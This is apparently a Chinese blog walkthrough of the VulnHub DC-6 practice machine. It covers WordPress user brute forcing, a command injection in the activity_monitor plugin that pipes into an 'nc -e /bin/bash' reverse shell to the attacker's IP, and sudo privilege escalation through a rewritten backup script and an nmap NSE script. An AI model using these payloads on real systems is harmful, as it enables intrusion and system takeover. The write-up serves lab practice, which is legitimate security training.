• DC-6靶机


    仅供个人娱乐

    靶机信息

    下载地址:https://download.vulnhub.com/dc/DC-6.zip

    一、主机发现

    nmap -sn 192.168.216.0/24

    二、端口扫描

    nmap -p 1-65535 -sV 192.168.216.132

    三、漏洞查找和利用

    80端口

    打开网页

    发现其中 web 服务被重定向到 http://wordy/  修改host文件

    echo "192.168.216.131 literally.vulnerable" >> /etc/hosts

    或者在C:WindowsSystem32driversetc下的HOSTS文件中增加192.168.216.132 wordy

    wpscan --urlhttp://wordy/ --enumerate  主题

    wpscan --urlhttp://wordy/ --e u  用户

    爆破出5个用户名admin,jens,graham,sarah,mark 将其作为字典爆破,直接用kali自带的/usr/share/wordlists/rockyou.txt ,我的字典复制到root目录下了

    wpscan --url http://wordy/ -U 1.txt -P /root/rockyou.txt

    爆破出密码 账号密码mark  helpdesk01

    目录

    我们使用获得的密码登录http://wordy/wp-admin/

    可以看到安装了activity_monitor插件

    searchsploit activity monitor

    修改脚本

    开启一个简单的临时的web服务,去访问45274.html 来触发漏洞

    python -m SimpleHTTPServer 8000

    启动网页

    多次测试修改,为了方便改为1.html

    python -c 'import pty; pty.spawn("/bin/bash") #使用交互式命令行'

    或者访问http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools输入ip,点击lookup,通过抓包修改ip参数的值为baidu.com | nc -e /bin/bash 192.168.216.128 4444

    反弹成功

    拿到shell开始信息收集

    用户名和密码: graham  GSo7isUM1D4,由于系统开启了ssh

    使用sudo -l 查看目前用户可以执行的操作,发现我们可以运行jens用户下面的backups.sh。查看其内容是对web进行打包备份的

    查看信息


    执行这个脚本的时候会以jens用户来执行,方法:sudo -u jens /home/jens/backups.sh

    可以让jens执行/bin/bash就直接得到了jens的shell

    首先需要删除

    graham@dc-6:~$ cd /home/jens

    graham@dc-6:/home/jens$ ls

    backups.sh

    graham@dc-6:/home/jens$ cat /dev/null > backups.sh

    graham@dc-6:/home/jens$ cat backups.sh

    graham@dc-6:/home/jens$ ls

    backups.sh

    graham@dc-6:/home/jens$ cat backups.s

    graham@dc-6:/home/jens$ echo "/bin/bash" >>/home/jens/backups.sh

    graham@dc-6:/home/jens$ cat /home/jens/backups.sh

    /bin/bash

    graham@dc-6:/home/jens$ sudo -u jens ./backups.sh

    jens@dc-6:~$ whoami

    jens

    已经是jens用户了,我们继续执行sudo -l 命令去查找我们可以进行的操作。

    NOPASSWD: /usr/bin/nmap,jens用户可以在无需输入密码的情况下使用nmap,我们继续使用nmap去调用我们的脚本例如/bin/bash.

    nmap提权

    nmap有执行脚本的功能,通过编写特殊脚本,可以实现利用nmap提权(sudo提权)

    利用过程:写入一个执行bash的nmap脚本,运行

    echo "os.execute('/bin/bash')" > /tmp/root.nse

    sudo nmap --script=/tmp/root.nse



  • 相关阅读:
    Linux常用命令解释
    RAID 10 配置流程
    VMware workstation Windows 10虚拟机安装步骤
    yum仓库配置
    vi 常用命令
    Linux设备驱动动态插入内核与直接集成到内核方式的利弊分析
    常用的Linux命令行文本处理工具总结
    CentOS使用总结(不断更新)
    vsftpd出现“Response: 500 OOPS: cannot change directory”解决方法
    NFS共享服务挂载时出现“access denied by server while mounting”的解决方法
  • 原文地址:https://www.cnblogs.com/bingtang123/p/12838419.html
Copyright © 2020-2023  润新知